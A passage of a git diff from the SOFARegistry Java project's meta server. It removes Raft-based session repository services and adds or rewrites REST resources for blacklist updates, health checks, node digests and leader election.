-import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.meta.bootstrap.NodeConfig; -import com.alipay.sofa.registry.server.meta.repository.NodeRepository; -import com.alipay.sofa.registry.server.meta.repository.RepositoryService; -import com.alipay.sofa.registry.server.meta.store.RenewDecorate; -import com.alipay.sofa.registry.store.api.annotation.RaftService; -import org.springframework.beans.factory.annotation.Autowired; - -import java.io.IOException; -import java.util.HashSet; -import java.util.Map; -import java.util.Set; -import java.util.concurrent.ConcurrentHashMap; - -/** - * - * @author shangyu.wh - * @version $Id: SessionRepositoryService.java, v 0.1 2018-05-08 13:11 shangyu.wh Exp $ - */ -@RaftService(uniqueId = "sessionServer") -public class SessionRepositoryService extends AbstractSnapshotProcess - implements - RepositoryService> { - - private static final Logger LOGGER = LoggerFactory - .getLogger(SessionRepositoryService.class); - - @Autowired - private NodeConfig nodeConfig; - - /** - * session node store - */ - private ConcurrentHashMap> registry = new ConcurrentHashMap<>(); - - private Set snapShotFileNames = new HashSet<>(); - - /** - * constructor - */ - public SessionRepositoryService() { - } - - /** - * constructor - * @param registry - */ - public SessionRepositoryService(ConcurrentHashMap> registry) { - this.registry = registry; - } - - @Override - public SnapshotProcess copy() { - return new SessionRepositoryService(new ConcurrentHashMap<>(registry)); - } - - @Override - public RenewDecorate put(String ipAddress, RenewDecorate sessionNode) { - try { - RenewDecorate oldRenewDecorate = registry.get(ipAddress); - if (oldRenewDecorate != null && oldRenewDecorate.getRenewal() != null) { - LOGGER.info("Session node with connectId:" + ipAddress + " has already existed!"); - } - registry.put(ipAddress, sessionNode); - LOGGER.info("Put session node {} ok", ipAddress); - } catch (Exception e) { - LOGGER.error("Session node add error!", e); - throw new RuntimeException("Session node add error!", e); - } - return sessionNode; - } - - @Override - public RenewDecorate remove(Object key) { - try { - String ipAddress = (String) key; - RenewDecorate oldRenewDecorate = registry.remove(ipAddress); - if (oldRenewDecorate == null) { - LOGGER - .info("Remove Session node with ipAddress:" + ipAddress + " has not existed!"); - return null; - } - return oldRenewDecorate; - } catch (Exception e) { - LOGGER.error("Data Session remove error!", e); - throw new RuntimeException("Session node remove error!", e); - } - } - - @Override - public RenewDecorate replace(String ipAddress, - RenewDecorate sessionNode) { - RenewDecorate oldRenewDecorate = registry.get(ipAddress); - if (oldRenewDecorate != null && oldRenewDecorate.getRenewal() != null) { - oldRenewDecorate.setRenewal(sessionNode.getRenewal()); - oldRenewDecorate.reNew(); - } else { - LOGGER.error("Session node with ipAddress {} has not existed!", ipAddress); - throw new RuntimeException(String.format( - "Session node with ipAddress %s has not existed!", ipAddress)); - } - return sessionNode; - } - - @Override - public RenewDecorate get(Object key) { - try { - String ipAddress = (String) key; - RenewDecorate oldRenewDecorate = registry.get(ipAddress); - if (oldRenewDecorate != null && oldRenewDecorate.getRenewal() != null) { - return oldRenewDecorate; - } else { - LOGGER.warn("Session node with ipAddress {} has not existed!It not be registered!", - ipAddress); - return null; - } - } catch (Exception e) { - LOGGER.error("Get Session node error!", e); - throw new RuntimeException("Get Session node error!", e); - } - } - - @Override - public Map> getAllData() { - return registry; - } - - @Override - public Map>> getAllDataMap() { - Map>> map = new ConcurrentHashMap<>(); - map.put(nodeConfig.getLocalDataCenter(), registry); - return map; - } - - @Override - public Map> replaceAll(String dataCenter, - Map> map, - Long version) { - return null; - } - - @Override - public Map getNodeRepositories() { - Map map = new ConcurrentHashMap<>(); - map.put(nodeConfig.getLocalDataCenter(), new NodeRepository( - nodeConfig.getLocalDataCenter(), registry, System.currentTimeMillis())); - return map; - } - - @Override - public boolean save(String path) { - return save(path, registry); - } - - @Override - public synchronized boolean load(String path) { - try { - ConcurrentHashMap> map = load(path, - registry.getClass()); - registry.clear(); - registry.putAll(map); - return true; - } catch (IOException e) { - LOGGER.error("Load registry data error!", e); - return false; - } - } - - @Override - public Set getSnapshotFileNames() { - if (!snapShotFileNames.isEmpty()) { - return snapShotFileNames; - } - snapShotFileNames.add(this.getClass().getSimpleName()); - return snapShotFileNames; - } - - @Override - public boolean checkVersion(String key, Long version) { - return false; - } - - @Override - public Long getVersion(String key) { - return null; - } - - /** - * Setter method for property nodeConfig. - * - * @param nodeConfig value to be assigned to property nodeConfig - */ - public void setNodeConfig(NodeConfig nodeConfig) { - this.nodeConfig = nodeConfig; - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/service/SessionVersionRepositoryService.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/service/SessionVersionRepositoryService.java deleted file mode 100644 index 2c9db10c4..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/service/SessionVersionRepositoryService.java +++ /dev/null @@ -1,107 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.repository.service; - -import com.alipay.sofa.registry.jraft.processor.AbstractSnapshotProcess; -import com.alipay.sofa.registry.jraft.processor.SnapshotProcess; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.meta.repository.VersionRepositoryService; -import com.alipay.sofa.registry.store.api.annotation.RaftService; -import com.alipay.sofa.registry.util.VersionsMapUtils; - -import java.io.IOException; -import java.util.HashSet; -import java.util.Set; -import java.util.concurrent.ConcurrentHashMap; - -/** - * - * @author shangyu.wh - * @version $Id: DataVersionRepositoryService.java, v 0.1 2018-05-11 12:10 shangyu.wh Exp $ - */ -@RaftService(uniqueId = "sessionServer") -public class SessionVersionRepositoryService extends AbstractSnapshotProcess - implements - VersionRepositoryService { - - private static final Logger LOGGER = LoggerFactory - .getLogger(SessionVersionRepositoryService.class); - /** - * store dataCenter session list version,now just local dataCenter version - */ - private ConcurrentHashMap dataCenterListVersions = new ConcurrentHashMap(); - - private Set snapShotFileNames = new HashSet<>(); - - /** - * constructor - */ - public SessionVersionRepositoryService() { - } - - /** - * constructor - * @param dataCenterListVersions - */ - public SessionVersionRepositoryService(ConcurrentHashMap dataCenterListVersions) { - this.dataCenterListVersions = dataCenterListVersions; - } - - @Override - public SnapshotProcess copy() { - return new SessionVersionRepositoryService(new ConcurrentHashMap<>(dataCenterListVersions)); - } - - @Override - public boolean checkAndUpdateVersions(String dataCenterId, Long version) { - return VersionsMapUtils.checkAndUpdateVersions(dataCenterListVersions, dataCenterId, - version); - } - - @Override - public Long getVersion(String dataCenterId) { - return dataCenterListVersions.get(dataCenterId); - } - - @Override - public boolean save(String path) { - return save(path, dataCenterListVersions); - } - - @Override - public synchronized boolean load(String path) { - try { - ConcurrentHashMap map = load(path, dataCenterListVersions.getClass()); - dataCenterListVersions.clear(); - dataCenterListVersions.putAll(map); - return true; - } catch (IOException e) { - LOGGER.error("Load dataCenter versions data error!", e); - return false; - } - } - - @Override - public Set getSnapshotFileNames() { - if (!snapShotFileNames.isEmpty()) { - return snapShotFileNames; - } - snapShotFileNames.add(this.getClass().getSimpleName()); - return snapShotFileNames; - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/BlacklistDataResource.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/BlacklistDataResource.java new file mode 100644 index 000000000..6cff65adb --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/BlacklistDataResource.java @@ -0,0 +1,104 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.resource; + +import com.alipay.sofa.registry.common.model.console.PersistenceData; +import com.alipay.sofa.registry.common.model.console.PersistenceDataBuilder; +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.metaserver.ProvideDataChangeEvent; +import com.alipay.sofa.registry.core.model.Result; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.meta.provide.data.DefaultProvideDataNotifier; +import com.alipay.sofa.registry.server.meta.provide.data.ProvideDataService; +import com.alipay.sofa.registry.server.meta.resource.filter.LeaderAwareRestController; +import com.google.common.annotations.VisibleForTesting; +import javax.ws.rs.POST; +import javax.ws.rs.Path; +import javax.ws.rs.Produces; +import javax.ws.rs.core.MediaType; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author shangyu.wh + * @version $Id: StopPushDataResource.java, v 0.1 2018-07-25 11:40 shangyu.wh Exp $ + */ +@Path("blacklist") +@LeaderAwareRestController +public class BlacklistDataResource { + + private static final Logger DB_LOGGER = + LoggerFactory.getLogger(BlacklistDataResource.class, "[DBService]"); + + private static final Logger TASK_LOGGER = + LoggerFactory.getLogger(BlacklistDataResource.class, "[Task]"); + + @Autowired private ProvideDataService provideDataService; + + @Autowired private DefaultProvideDataNotifier provideDataNotifier; + + /** + * update blacklist e.g. curl -d + * '{"FORBIDDEN_PUB":{"IP_FULL":["1.1.1.1","10.15.233.150"]},"FORBIDDEN_SUB_BY_PREFIX":{"IP_FULL":["1.1.1.1"]}}' + * -H "Content-Type: application/json" -X POST http://localhost:9615/blacklist/update + */ + @POST + @Path("update") + @Produces(MediaType.APPLICATION_JSON) + public Result blacklistPush(String config) { + PersistenceData persistenceData = + PersistenceDataBuilder.createPersistenceData(ValueConstants.BLACK_LIST_DATA_ID, config); + try { + + boolean ret = provideDataService.saveProvideData(persistenceData); + DB_LOGGER.info("Success update blacklist to DB result {}!", ret); + } catch (Throwable e) { + DB_LOGGER.error("Error update blacklist to DB!", e); + throw new RuntimeException("Update blacklist to error!", e); + } + + fireDataChangeNotify(persistenceData.getVersion(), ValueConstants.BLACK_LIST_DATA_ID); + + Result result = new Result(); + result.setSuccess(true); + return result; + } + + private void fireDataChangeNotify(Long version, String dataInfoId) { + + ProvideDataChangeEvent provideDataChangeEvent = new ProvideDataChangeEvent(dataInfoId, version); + if (TASK_LOGGER.isInfoEnabled()) { + TASK_LOGGER.info( + "send PERSISTENCE_DATA_CHANGE_NOTIFY_TASK notifyProvideDataChange: {}", + provideDataChangeEvent); + } + provideDataNotifier.notifyProvideDataChange(provideDataChangeEvent); + } + + @VisibleForTesting + protected BlacklistDataResource setProvideDataService(ProvideDataService provideDataService) { + this.provideDataService = provideDataService; + return this; + } + + @VisibleForTesting + protected BlacklistDataResource setProvideDataNotifier( + DefaultProvideDataNotifier provideDataNotifier) { + this.provideDataNotifier = provideDataNotifier; + return this; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/DecisionModeResource.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/DecisionModeResource.java deleted file mode 100644 index b78f9ccaf..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/DecisionModeResource.java +++ /dev/null @@ -1,50 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.resource; - -import com.alipay.sofa.registry.core.model.Result; -import com.alipay.sofa.registry.server.meta.bootstrap.MetaServerConfig; -import com.alipay.sofa.registry.server.meta.bootstrap.MetaServerConfig.DecisionMode; -import com.alipay.sofa.registry.server.meta.bootstrap.MetaServerConfigBean; -import org.springframework.beans.factory.annotation.Autowired; - -import javax.ws.rs.POST; -import javax.ws.rs.Path; -import javax.ws.rs.Produces; -import javax.ws.rs.core.MediaType; - -/** - * - * @author shangyu.wh - * @version $Id: DecisionModeResource.java, v 0.1 2018-02-01 16:50 shangyu.wh Exp $ - */ -@Path("decisionMode") -public class DecisionModeResource { - - @Autowired - private MetaServerConfig metaServerConfig; - - @POST - @Produces(MediaType.APPLICATION_JSON) - public Result changeDecisionMode(DecisionMode decisionMode) { - ((MetaServerConfigBean) metaServerConfig).setDecisionMode(decisionMode); - Result result = new Result(); - result.setSuccess(true); - return result; - } - -} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/HealthResource.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/HealthResource.java index 8e6970390..a103efe6f 100644 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/HealthResource.java +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/HealthResource.java @@ -16,87 +16,110 @@ */ package com.alipay.sofa.registry.server.meta.resource; +import com.alipay.sofa.common.profile.StringUtil; import com.alipay.sofa.registry.common.model.CommonResponse; -import com.alipay.sofa.registry.jraft.bootstrap.ServiceStateMachine; +import com.alipay.sofa.registry.metrics.ReporterUtils; +import com.alipay.sofa.registry.server.meta.MetaLeaderService; import com.alipay.sofa.registry.server.meta.bootstrap.MetaServerBootstrap; -import com.alipay.sofa.registry.server.meta.remoting.RaftExchanger; -import org.springframework.beans.factory.annotation.Autowired; - +import com.alipay.sofa.registry.server.meta.metaserver.CurrentDcMetaServer; +import com.codahale.metrics.Gauge; +import com.codahale.metrics.MetricRegistry; +import com.google.common.annotations.VisibleForTesting; +import javax.annotation.PostConstruct; import javax.ws.rs.GET; import javax.ws.rs.Path; import javax.ws.rs.Produces; import javax.ws.rs.core.MediaType; +import javax.ws.rs.core.Response; +import javax.ws.rs.core.Response.ResponseBuilder; +import javax.ws.rs.core.Response.Status; +import org.springframework.beans.factory.annotation.Autowired; /** - * * @author shangyu.wh * @version $Id: PushSwitchResource.java, v 0.1 2018-10-29 16:51 shangyu.wh Exp $ */ @Path("health") public class HealthResource { - @Autowired - private MetaServerBootstrap metaServerBootstrap; + @Autowired private MetaServerBootstrap metaServerBootstrap; - @Autowired - private RaftExchanger raftExchanger; + @Autowired private MetaLeaderService metaLeaderService; - @GET - @Path("check") - @Produces(MediaType.APPLICATION_JSON) - public CommonResponse checkHealth() { + @Autowired private CurrentDcMetaServer currentDcMetaServer; - CommonResponse response; + @PostConstruct + public void init() { + MetricRegistry metrics = new MetricRegistry(); + metrics.register("healthCheck", (Gauge) () -> getHealthCheckResult()); + ReporterUtils.startSlf4jReporter(60, metrics); + } - StringBuilder sb = new StringBuilder("MetaServerBoot "); - - boolean start = metaServerBootstrap.getSessionStart().get(); - boolean ret = start; - sb.append("sessionRegisterServer:").append(start); - - start = metaServerBootstrap.getDataStart().get(); - ret = ret && start; - sb.append(", dataRegisterServerStart:").append(start); - - start = metaServerBootstrap.getMetaStart().get(); - ret = ret && start; - sb.append(", otherMetaRegisterServerStart:").append(start); + @GET + @Path("check") + @Produces(MediaType.APPLICATION_JSON) + public Response checkHealth() { + ResponseBuilder builder = Response.status(Response.Status.OK); + CommonResponse response = getHealthCheckResult(); + builder.entity(response); + if (!response.isSuccess()) { + builder.status(Status.INTERNAL_SERVER_ERROR); + } + return builder.build(); + } - start = metaServerBootstrap.getHttpStart().get(); - ret = ret && start; - sb.append(", httpServerStart:").append(start); + private CommonResponse getHealthCheckResult() { + CommonResponse response; - start = raftExchanger.getServerStart().get(); - ret = ret && start; - sb.append(", raftServerStart:").append(start); + StringBuilder sb = new StringBuilder("MetaServerBoot "); - start = raftExchanger.getClientStart().get(); - ret = ret && start; - sb.append(", raftClientStart:").append(start); + boolean start = metaServerBootstrap.isRpcServerForSessionStarted(); + boolean ret = start; + sb.append("sessionRegisterServer:").append(start); - start = raftExchanger.getClsStart().get(); - ret = ret && start; - sb.append(", raftManagerStart:").append(start); + start = metaServerBootstrap.isRpcServerForDataStarted(); + ret = ret && start; + sb.append(", dataRegisterServerStart:").append(start); - start = ServiceStateMachine.getInstance().isLeader() - || ServiceStateMachine.getInstance().isfollower(); - ret = ret && start; + start = metaServerBootstrap.isRpcServerForMetaStarted(); + ret = ret && start; + sb.append(", otherMetaRegisterServerStart:").append(start); - if (ServiceStateMachine.getInstance().isLeader()) { + start = metaServerBootstrap.isHttpServerStarted(); + ret = ret && start; + sb.append(", httpServerStart:").append(start); - sb.append(", raftStatus:").append("Leader"); - } else if (ServiceStateMachine.getInstance().isfollower()) { - sb.append(", raftStatus:").append("Follower"); - } else { - sb.append(", raftStatus:").append(start); - } + boolean leaderNotEmpty = StringUtil.isNotBlank(metaLeaderService.getLeader()); + ret = ret && leaderNotEmpty; - if (ret) { - response = CommonResponse.buildSuccessResponse(sb.toString()); - } else { - response = CommonResponse.buildFailedResponse(sb.toString()); - } + sb.append(", role:").append(metaLeaderService.amILeader() ? "leader" : "follower"); + sb.append(", warmuped:").append(metaLeaderService.isWarmuped()); + sb.append(", leader:").append(metaLeaderService.getLeader()); + sb.append(", meta-servers:").append(currentDcMetaServer.getClusterMembers()); - return response; + if (ret) { + response = CommonResponse.buildSuccessResponse(sb.toString()); + } else { + response = CommonResponse.buildFailedResponse(sb.toString()); } -} \ No newline at end of file + return response; + } + + @VisibleForTesting + protected HealthResource setMetaServerBootstrap(MetaServerBootstrap metaServerBootstrap) { + this.metaServerBootstrap = metaServerBootstrap; + return this; + } + + @VisibleForTesting + protected HealthResource setMetaLeaderService(MetaLeaderService metaLeaderService) { + this.metaLeaderService = metaLeaderService; + return this; + } + + @VisibleForTesting + protected HealthResource setCurrentDcMetaServer(CurrentDcMetaServer currentDcMetaServer) { + this.currentDcMetaServer = currentDcMetaServer; + return this; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/MetaDigestResource.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/MetaDigestResource.java index 538614f15..f10bce534 100644 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/MetaDigestResource.java +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/MetaDigestResource.java @@ -19,100 +19,119 @@ import com.alipay.sofa.registry.common.model.Node.NodeType; import com.alipay.sofa.registry.common.model.console.PersistenceData; import com.alipay.sofa.registry.common.model.constants.ValueConstants; -import com.alipay.sofa.registry.common.model.metaserver.NodeChangeResult; import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.meta.registry.Registry; +import com.alipay.sofa.registry.metrics.ReporterUtils; +import com.alipay.sofa.registry.server.meta.metaserver.impl.DefaultMetaServerManager; +import com.alipay.sofa.registry.server.meta.provide.data.ProvideDataService; +import com.alipay.sofa.registry.server.meta.resource.filter.LeaderAwareRestController; import com.alipay.sofa.registry.store.api.DBResponse; -import com.alipay.sofa.registry.store.api.DBService; import com.alipay.sofa.registry.store.api.OperationStatus; -import com.alipay.sofa.registry.store.api.annotation.RaftReference; -import org.springframework.beans.factory.annotation.Autowired; - +import com.codahale.metrics.Gauge; +import com.codahale.metrics.MetricRegistry; +import com.google.common.annotations.VisibleForTesting; +import java.util.HashMap; +import java.util.Map; +import javax.annotation.PostConstruct; import javax.ws.rs.GET; import javax.ws.rs.Path; import javax.ws.rs.PathParam; import javax.ws.rs.Produces; import javax.ws.rs.core.MediaType; -import java.util.HashMap; -import java.util.Map; +import org.springframework.beans.factory.annotation.Autowired; /** - * * @author shangyu.wh * @version $Id: MetaDigestResource.java, v 0.1 2018-06-25 21:13 shangyu.wh Exp $ */ @Path("digest") +@LeaderAwareRestController public class MetaDigestResource { - private static final Logger TASK_LOGGER = LoggerFactory.getLogger(MetaDigestResource.class, - "[Resource]"); + private static final Logger TASK_LOGGER = + LoggerFactory.getLogger(MetaDigestResource.class, "[Resource]"); - private static final Logger DB_LOGGER = LoggerFactory.getLogger(MetaDigestResource.class, - "[DBService]"); + private static final Logger DB_LOGGER = + LoggerFactory.getLogger(MetaDigestResource.class, "[DBService]"); - @Autowired - private Registry metaServerRegistry; + @Autowired private DefaultMetaServerManager metaServerManager; - @RaftReference - private DBService persistenceDataDBService; + @Autowired private ProvideDataService provideDataService; - @GET - @Path("{type}/node/query") - @Produces(MediaType.APPLICATION_JSON) - public Map getRegisterNodeByType(@PathParam("type") String type) { - try { - NodeChangeResult nodeChangeResult = metaServerRegistry.getAllNodes(NodeType - .valueOf(type.toUpperCase())); - return nodeChangeResult.getNodes(); - } catch (Exception e) { - TASK_LOGGER.error("Fail get Register Node By Type {} !", type, e); - throw new RuntimeException("Fail get Register Node By Type" + type, e); - } + @PostConstruct + public void init() { + MetricRegistry metrics = new MetricRegistry(); + metrics.register( + "metaNodeList", (Gauge) () -> getRegisterNodeByType(NodeType.META.name())); + metrics.register( + "dataNodeList", (Gauge) () -> getRegisterNodeByType(NodeType.DATA.name())); + metrics.register( + "sessionNodeList", (Gauge) () -> getRegisterNodeByType(NodeType.SESSION.name())); + metrics.register("pushSwitch", (Gauge) () -> getPushSwitch()); + ReporterUtils.startSlf4jReporter(60, metrics); + } + + @GET + @Path("{type}/node/query") + @Produces(MediaType.APPLICATION_JSON) + public Map getRegisterNodeByType(@PathParam("type") String type) { + try { + return metaServerManager.getSummary(NodeType.valueOf(type.toUpperCase())).getNodes(); + } catch (Exception e) { + TASK_LOGGER.error("Fail get Register Node By Type:{}", type, e); + throw new RuntimeException("Fail get Register Node By Type:" + type, e); } + } - /** - * return true mean push switch on - */ - @GET - @Path("pushSwitch") - @Produces(MediaType.APPLICATION_JSON) - public Map getPushSwitch() { - Map resultMap = new HashMap<>(1); - try { - DBResponse ret = persistenceDataDBService - .get(ValueConstants.STOP_PUSH_DATA_SWITCH_DATA_ID); + /** return true mean push switch on */ + @GET + @Path("pushSwitch") + @Produces(MediaType.APPLICATION_JSON) + public Map getPushSwitch() { + Map resultMap = new HashMap<>(1); + try { + DBResponse ret = + provideDataService.queryProvideData(ValueConstants.STOP_PUSH_DATA_SWITCH_DATA_ID); - if (ret == null) { - //default push switch on - resultMap.put("pushSwitch", "open"); - resultMap.put("msg", "get null Data from db!"); - } else { - if (ret.getOperationStatus() == OperationStatus.SUCCESS) { - PersistenceData data = (PersistenceData) ret.getEntity(); - String result = data.getData(); - if (result != null && !result.isEmpty()) { - resultMap.put("pushSwitch", "false".equalsIgnoreCase(result) ? "open" - : "closed"); - } else { - resultMap.put("pushSwitch", "open"); - resultMap.put("msg", "data is empty"); - } - } else if (ret.getOperationStatus() == OperationStatus.NOTFOUND) { - resultMap.put("pushSwitch", "open"); - resultMap.put("msg", "OperationStatus is NOTFOUND"); - } else { - DB_LOGGER.error("get Data DB status error!"); - throw new RuntimeException("Get Data DB status error!"); - } - } - DB_LOGGER.info("getPushSwitch: {}", resultMap); - } catch (Exception e) { - DB_LOGGER.error("get persistence Data dataInfoId {} from db error!", - ValueConstants.STOP_PUSH_DATA_SWITCH_DATA_ID, e); - throw new RuntimeException("Get persistence Data from db error!", e); + if (ret.getOperationStatus() == OperationStatus.SUCCESS) { + String result = getEntityData(ret); + if (result != null && !result.isEmpty()) { + resultMap.put("stopPush", result); + } else { + resultMap.put("stopPush", result); + resultMap.put("msg", "data is empty"); } + } else if (ret.getOperationStatus() == OperationStatus.NOTFOUND) { + resultMap.put("msg", "OperationStatus is NOTFOUND"); + } + DB_LOGGER.info("[getPushSwitch] {}", resultMap); + } catch (Exception e) { + DB_LOGGER.error( + "get persistence Data dataInfoId {} from db error!", + ValueConstants.STOP_PUSH_DATA_SWITCH_DATA_ID, + e); + throw new RuntimeException("Get persistence Data from db error!", e); + } - return resultMap; + return resultMap; + } + + private static String getEntityData(DBResponse resp) { + if (resp != null && resp.getEntity() != null) { + return resp.getEntity().getData(); } -} \ No newline at end of file + return null; + } + + @VisibleForTesting + protected MetaDigestResource setMetaServerManager(DefaultMetaServerManager metaServerManager) { + this.metaServerManager = metaServerManager; + return this; + } + + @VisibleForTesting + protected MetaDigestResource setProvideDataService(ProvideDataService provideDataService) { + this.provideDataService = provideDataService; + return this; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/MetaLeaderResource.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/MetaLeaderResource.java new file mode 100644 index 000000000..60feea1d8 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/MetaLeaderResource.java @@ -0,0 +1,92 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.resource; + +import com.alipay.sofa.registry.common.model.CommonResponse; +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.common.model.elector.LeaderInfo; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.meta.MetaLeaderService; +import com.alipay.sofa.registry.server.meta.resource.filter.LeaderAwareRestController; +import com.alipay.sofa.registry.store.api.elector.LeaderElector; +import com.google.common.annotations.VisibleForTesting; +import javax.ws.rs.GET; +import javax.ws.rs.PUT; +import javax.ws.rs.Path; +import javax.ws.rs.Produces; +import javax.ws.rs.core.MediaType; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author xiaojian.xj + * @version $Id: MetaLeaderResource.java, v 0.1 2021年03月22日 10:19 xiaojian.xj Exp $ + */ +@Path("meta/leader") +public class MetaLeaderResource { + + private final Logger logger = LoggerFactory.getLogger(getClass()); + + @Autowired private MetaLeaderService metaLeaderService; + + @Autowired private LeaderElector leaderElector; + + @GET + @Path("query") + @Produces(MediaType.APPLICATION_JSON) + @LeaderAwareRestController + public GenericResponse queryLeader() { + logger.info("[queryLeader] begin"); + + try { + String leader = metaLeaderService.getLeader(); + long epoch = metaLeaderService.getLeaderEpoch(); + LeaderInfo leaderInfo = new LeaderInfo(epoch, leader); + return new GenericResponse().fillSucceed(leaderInfo); + } catch (Throwable throwable) { + logger.error("[queryLeader] error.", throwable); + return new GenericResponse().fillFailed(throwable.getMessage()); + } + } + + @PUT + @Path("/quit/election") + @Produces(MediaType.APPLICATION_JSON) + public CommonResponse quitElection() { + logger.info("[quitElection] begin"); + + try { + leaderElector.change2Observer(); + return GenericResponse.buildSuccessResponse(); + } catch (Throwable throwable) { + logger.error("[quitElection] error.", throwable); + return GenericResponse.buildFailedResponse(throwable.getMessage()); + } + } + + @VisibleForTesting + protected MetaLeaderResource setMetaLeaderService(MetaLeaderService metaLeaderService) { + this.metaLeaderService = metaLeaderService; + return this; + } + + @VisibleForTesting + protected MetaLeaderResource setLeaderElector(LeaderElector leaderElector) { + this.leaderElector = leaderElector; + return this; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/MetaStoreResource.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/MetaStoreResource.java deleted file mode 100644 index 851b50e93..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/resource/MetaStoreResource.java +++ /dev/null @@ -1,216 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.resource; - -import com.alipay.sofa.jraft.entity.PeerId; -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.common.model.metaserver.MetaNode; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.core.model.Result; -import com.alipay.sofa.registry.net.NetUtil; -import com.alipay.sofa.registry.server.meta.bootstrap.NodeConfig; -import com.alipay.sofa.registry.server.meta.registry.Registry; -import com.alipay.sofa.registry.server.meta.remoting.RaftExchanger; -import com.google.common.collect.Lists; -import org.apache.commons.lang.StringUtils; -import org.slf4j.Logger; -import org.slf4j.LoggerFactory; -import org.springframework.beans.factory.annotation.Autowired; - -import javax.ws.rs.FormParam; -import 